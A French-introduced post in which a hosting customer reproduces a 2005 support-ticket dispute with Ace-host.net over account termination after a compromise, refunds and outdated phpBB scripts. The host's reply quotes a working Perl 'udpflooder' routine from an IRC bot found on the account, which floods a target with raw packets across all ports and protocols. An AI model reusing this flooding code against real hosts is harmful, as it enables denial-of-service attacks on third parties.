Sur Ace-host.net.    
 
Je vais intenter des poursuites suite à la fermeture de mon compte, après un an de service impeccable, il ferme mon compte 8 jours après le paiement pour un an et sans remboursement pour les raisions qui suivent et que j'inclus:  
 
Supposément un script, mais que j'ai installé avec LEUR console Cpanel et dont EUX offre la version.  Voici les détails...À lire pour tous ceux qui veulent s'acheter un espace web:  
 
   
Posted on 14 Nov 2005 02:29 PM  
________________________________________  
My website is still down after paiement and everything cleared. WHY??? I need it to work and to get ready for exams. Any info????!!!  
 
   
Posted on 14 Nov 2005 02:58 PM  
________________________________________  
You were again suspended for hacking scripts within your account. Unfortunately as this is the second time we have found abusive files within your account we can no longer host your domain. Below you will find all the information on this.  
 
 
 
root@storm [/tmp]# ls -l | grep carle126  
-rw-r--r-- 1 carle126 carle126 40 Nov 8 16:39 aleks_fixed_pwned_two  
-rw-r--r-- 1 carle126 carle126 27982 Nov 13 04:01 bot.txt.1  
-rw-r--r-- 1 carle126 carle126 28046 Nov 13 05:24 bot.txt.2  
-rw-r--r-- 1 carle126 carle126 28046 Nov 13 05:24 bot.txt.3  
-rw-r--r-- 1 carle126 carle126 28046 Nov 13 05:24 bot.txt.4  
-rw-r--r-- 1 carle126 carle126 28046 Nov 13 05:24 bot.txt.5  
-rw-r--r-- 1 carle126 carle126 28046 Nov 13 05:24 bot.txt.6  
-rw-r--r-- 1 carle126 carle126 28046 Nov 13 05:24 bot.txt.7  
-rw-r--r-- 1 carle126 carle126 17847 Nov 13 08:01 fos.txt  
-rw-r--r-- 1 carle126 carle126 28046 Nov 13 19:00 fos.txt.1  
-rw-r--r-- 1 carle126 carle126 28046 Nov 13 19:00 fos.txt.2  
 
---------------------------------  
 
sub udpflooder {  
my $iaddr = inet_aton($_[0]);  
my $msg = 'A' x $_[1];  
my $ftime = $_[2];  
my $cp = 0;  
my (%pacotes);  
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;  
 
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;  
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;  
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;  
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;  
return(undef) if $cp == 4;  
my $itime = time;  
my ($cur_time);  
while ( 1 ) {  
for (my $porta = 1; $porta <= 65000; $porta++) {  
$cur_time = time - $itime;  
last if $cur_time >= $ftime;  
send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;  
send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;  
send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;  
send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;  
 
for (my $pc = 3; $pc <= 255;$pc++) {  
next if $pc == 6;  
$cur_time = time - $itime;  
last if $cur_time >= $ftime;  
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;  
send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;  
}  
}  
last if $cur_time >= $ftime;  
}  
return($cur_time, %pacotes);  
}  
 
sub ctcp {  
return unless $#_ == 1;  
sendraw("PRIVMSG $_[0] :01$_[1]01" );  
 
   
Posted on 14 Nov 2005 03:25 PM  
________________________________________  
What's that all about?? I am trying to hack something?? What are those hacking scripts?? I am not at all a computer programmer. What does this mean??? Can you give some more infos??? I don't understand anything you mentionned. Thanks!  
 
   
Posted on 14 Nov 2005 03:28 PM  
________________________________________  
and is this supposed to show a lack in your security or that I am an hacker?? Do you think I am the one that wrote down and add those scripts? You must have a log or anything no? I have not created/edited pages since long time. I am just adding pdf to a page pol5910.html since three weeks. I really don't get it.  
 
   
Posted on 14 Nov 2005 03:36 PM  
________________________________________  
We definitely understand that this situation may not have been intentional or even that you had been aware of it.  
 
However the issue remains that through an insecure/exploitable script on your account someone was able to gain access to the account and run these scripts.  
 
As this was a repeat offense essentially we take it as you are either unable or unwilling to secure any PHP/CGI scripts on the account. As such we cannot risk the integrity of our servers with this account any further. We apologize for this however we must hold interest in the quality of our services.  
 
   
Posted on 14 Nov 2005 03:45 PM  
________________________________________  
So will I get my money back?? Also, I only have scripts installed by your installer within the Cpanel like PHPBB and other stuff. Are you not the ones that are supposed to look at the integrity of the security? I only had one script made by a technician wich I don't use cause I don't know how. No way I can be responsible for it and pay for a security issue I can't control since I cannot look at codes I don't understand. You are not offering any service for third party script (phobb), but why are you allowing people to use it then if they could possibly be hacked? Can you also tell me what page they are using or wich script? So I can figure out and take them off? I think your way to deal with it is kinda abusive since when I signed up with you I was just a novice and so am I today. I really don't understand. Will I be allows to do a backup of files also? This is going to quick.  
 
   
Posted on 14 Nov 2005 03:47 PM  
________________________________________  
Also, you could give a warning. Last time it was suspended, you told me it was a credit card change issue. I never heard anything about a hack script. I think it's obvious I would have tried something. I really need that site. Can you not give any info that would help me to solve the problem?  
 
   
Posted on 14 Nov 2005 03:59 PM  
________________________________________  
"So will I get my money back?? "  
---  
Unfortunately no refunds are offered outside the initial 30-days of account creation.  
 
"Are you not the ones that are supposed to look at the integrity of the security?"  
---  
Fantastico is a service we offer as-is as a benefit to our clients. Scripts are regularly audited by the handlers of Fantastico and there are certain scripts which are time-to-time disabled by Fantastico authors for security issues. However this only effects future installs, if the script is already installed, it will not disable it.  
 
"I only had one script made by a technician wich I don't use cause I don't know how. No way I can be responsible for it and pay for a security issue I can't control since I cannot look at codes I don't understand. "  
---  
Unfortunately not being able to understand a situation does not absolve responsibility. It is your responsibility to secure the account on the account-level, our responsibility is at the server-level to ensure nothing is compromised with the server.  
 
"You are not offering any service for third party script (phobb), but why are you allowing people to use it then if they could possibly be hacked?"  
---  
Roughly 95% of scripts today are exploitable. It is only a matter of time before those exploits are discovered (Even Windows has regular security patches). As with microsoft's technique, the best way to prevent issues is to keep your scripts updated. Leaving your scripts out-of-date is a huge security risk and is more than likely the reason for this situation.  
 
"Can you also tell me what page they are using or wich script? "  
---  
Unfortunately that information is not readily available at this time. However usage of phpBB does imply that you may be using a version prior to 2.0.16 which had some severe exploits in it. 2.0.16 was released sometime earlier this year within the first half I believe.  
 
"Will I be allows to do a backup of files also?"  
---  
If you would like backups of your files we can provide them during non-peak hours. However I would strongly recommend against uploading these to another hosting service otherwise a repeat situation will occur with them. The account *is* infected and will continue to operate as such.  
 
Please let us know if we can further answer any other questions.  
 
   
Posted on 14 Nov 2005 04:11 PM  
________________________________________  
It looks that I've been fooled to me since I never had any opportunity to realised there was a problem. You never sent me a paper, no way to know it within the cpanel. Overall, no way to know it at all exept from your computer monitoring program.  
 
"However this only effects future installs, if the script is already installed, it will not disable it."  
 
So you should be aware of upcoming problems and should find a way to let people know when a product released and installed is at risk to let people fix them or upgrade them to a safe version.  
 
"Unfortunately not being able to understand a situation does not absolve responsibility."  
 
Not being able to understand is a thing. Not being able to even know when there is a problem is another thing. If I would have noticed any problem, I would have uninstalled any script, made a backup of my things and contact you to have some infos so I could made any fix to it.  
 
"As with microsoft's technique, the best way to prevent issues is to keep your scripts updated. Leaving your scripts out-of-date is a huge security risk and is more than likely the reason for this situation."  
 
Then you should make update available or give any info on newer version or upgrade of product. Even tell people that update will be available or even tell that they are responsible.  
 
"Unfortunately that information is not readily available at this time."  
 
That's a good one, it shows how both of us understand this situation.  
 
Also, from your site, you are hacker safe. Sad it does not apply to me. I really don't understand. And I'm still in the 30 days of new site since I paid only last week or so isn't it?  
 
   
Posted on 14 Nov 2005 04:19 PM  
________________________________________  
The account start date is listed as: 10/25/2004  
As such the 30-day guarantee ended on 11/25/2004  
 
As today is 11/14/2005, it is well beyond the moneyback guarantee.  
 
----  
 
"So you should be aware of upcoming problems and should find a way to let people know when a product released and installed is at risk to let people fix them or upgrade them to a safe version."  
---  
We are not automatically notified, the process is handled entirely in an automated update process via Fantastico's developers through our auto-update software. Even then, we host over 35,000 domains which employ multiple fantastico scripts. Monitoring and "enforcing" that people upgrade 100,000 scripts or more is simply unrealistic. There is a certain level of responsibility in which the client has to maintain secure scripts that they install. We *do* offer one-click upgrades through Fantastico as soon as updates are available via Fantastico's developers. This can be done through your cPanel.  
 
"Then you should make update available or give any info on newer version or upgrade of product. Even tell people that update will be available or even tell that they are responsible."  
---  
For any update notification you will need to monitor Fantastico's site (http://www.netenberg.com) or the author's site for your specific script. For example, phpBB offers automatic notifications on updates through their site. This is not a service in which we directly offer however. This is why we recommend clients check twice-monthly for any script updates via a 2 minute check in cPanel.  
 
--  
 
Let us know if you have any further inquiries.  
 
   
Posted on 14 Nov 2005 04:32 PM  
________________________________________  
so what are we doing now? You had all informations to avoid the problem and give informations. I would feel really bad my relation with your company ending like that. Anyway to get a chance to fix it and to remove all my script??? I WAS NEVER able to know about that situation only after you cut everythign AND ONLY AFTER I COMPLAINED ABOUT IT. Come on! I should 1) be allow to have the balance of my hosting back (cause I paid last week for the next year) Or have a second chance (since I never had one) to fix it.  
 
isn't it possible?  
 
   
Posted on 14 Nov 2005 04:35 PM  
________________________________________  
Unfortunately as this is a repeat offense for the situation we effectively can no longer risk the integrity of our servers with this account.  
 
As a result we cannot reinstate it for any reason.  
 
   
Posted on 14 Nov 2005 04:39 PM  
________________________________________  
then the only way is to solve it with lawyers I guess. There's no way a company can isolate a client in a process where both recognised having be a part of responsibility. The way you are writing gives the idea that the whole server integrity is the reseponsibility of the owners and not the one of the admins. I'll have to go further with it on hosting review site. Again, I never was able to solve that situation. I'll have to call your compagny. Can I please have your name.  
 
Thanks
 
 
 
 
 
Comme je l'ai écris à la fin du message sur le sujet, mais que plus personne ne devait lire.  Je suis à la recherche d'histoires similaires.  Si vous pouvez juste m'écrire votre histoire, même en utilisant un pseudo à mon adresse : guicarle@gmail.com se serait très apprécié.  Ce n'est pas du spam, mais je suis vraiment fâché qu'on normalise une pratique comme celle-ci.  Merci pour tout support en commentaires ou informations.